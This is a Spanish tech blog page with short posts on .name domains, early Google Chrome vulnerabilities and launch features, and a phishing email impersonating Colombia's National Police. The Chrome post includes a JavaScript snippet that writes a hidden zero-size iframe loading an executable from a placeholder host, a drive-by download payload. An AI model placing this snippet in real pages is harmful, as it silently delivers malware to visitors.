gEEK tHE pLANET

He visto que ultimamente, se ha puesto de moda tener sitios personales con dominios del estilo nombre+apellido.com, o tunick.com, el único “problemita” es que a todos se les ha olvidado de la existencia de los dominios .name, son relativamente recientes, fueron creados por la ICANN en el 2001 junto a los dominios .info, .biz, .museum, .aero.

Los dominios .name técnicamente ofrece las mismas posibilidades que un dominio .com, .net o un .org, ya que permite tener los mismos servicios (direcciones de web, direcciones de correo electrónico, etc), con la única diferencia que estos están dedicados única y exclusivamente para personas.

Los que han comprando dominios nombre+apellido.com, pues de alguna manera han perdido su dinero, ya que estos dominios fueron creados para la utilización comercial, así como los .org para organizaciónes, .edu para educación, .net para cosas relacionadas con redes; ninguno de los dominios que mostré anteriormente tiene restricciones de uso, es decir pueder ser comprado por cualquiera para cualquier fin. [Leer mas]

De estas 3 vulnerabilidades me entero gracias a Dragon.

1. Vulnerable a carpet bombing, una vulnerabilidad descubierta por el investigador Aviv Raff en el motor web opensource Webkit (Base del navegador Google Chrome y Safari) que permite descargar automáticamente archivos cuando el usuario navega por una página maliciosa.
2. Fallo en la librería chrome.dll (versión 0.2.149.27) del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google Chrome ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de pestañas independientes de este navegador.
3. Consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.

   
   <script>
   document.write('<iframe src="http://tusitio.com/malware.exe" frameborder="0" width="0" height="0">');
   </script>
   

Creo que 3 vulnerabilidades son más que suficientes para demostrar que de momento google Chrome es un desastre absoluto.

Leer Más: Vulnerabilidades en Google Chrome (I)
Vulnerabilidades en Google Chrome (II)
Vulnerabilidades en Google Chrome (III)

Pues no se que Huso horario utilizará la gente de google, yo estoy en GMT -5. La hora es 07:29 AM y sigo sin poder descargar el google chrome.

Por más que lo intento siempre me redirecciona la página principal del buscador.

Actualización: Descargar Google Chrome

Ya estaba a punto de escribir sobre esto cuando me llegó un twitteo de fayerwayer, las primeras imágenes sobre Chrome, al parece mañana será lanzado en más de 100 paises, disponible sólo para Windows.

Completando un poco el post, les muestro algunas características:

• Opensource basado en Webkit.
• Autocompletado en la barra de navegación.
• Google Gears integrado de serie en el navegador.
• Pantalla de inicio en la que aparecen en miniatura los sitios más visitados, tipo Speed Dial de Opera.
• Modo de navegación privada.
• Un tratamiento especial a las aplicaciones de web, de tal manera que se abran como aplicaciones, sin barra de navegación y sin pestañas.
• Cada pestaña funcionará como un proceso independiente, brindando estabilidad al navegador.

Leer Más: Una renovada perspectiva sobre los navegadores
A fresh take on the browser
Book Google Chrome
Google Chrome Screenshots

De vez en cuando como que escuchar las noticias de las cadenas nacionales sirve, me enteré de esta noticia.

Al parecer sujetos inescrupulosos están utilizando el nombre de la Policia Nacional de Colombia para enviar un peligroso virus informático. El correo tiene como asunto “CARTA #23673″ enviado supuestamente a nombre de la institución y en el que se pide información fundamental para la Policía.

El correo pide al usuario que ingrese a un enlace en el que podrá descargar un formulario, sin embargo en realidad ejecuta un archivo con un virus que afecta el computador y además busca extraer información personal y financiera de los ciudadanos.

La policia nacional no pide este tipo de información via correo electrónico, así que por favor no se dejen engañar de este tipo de personas, tengan un poco de malicia indígena como decimos nosotros los Colombianos.

Leer Más: Utilizan el nombre de la Policía Nacional para mandar peligroso virus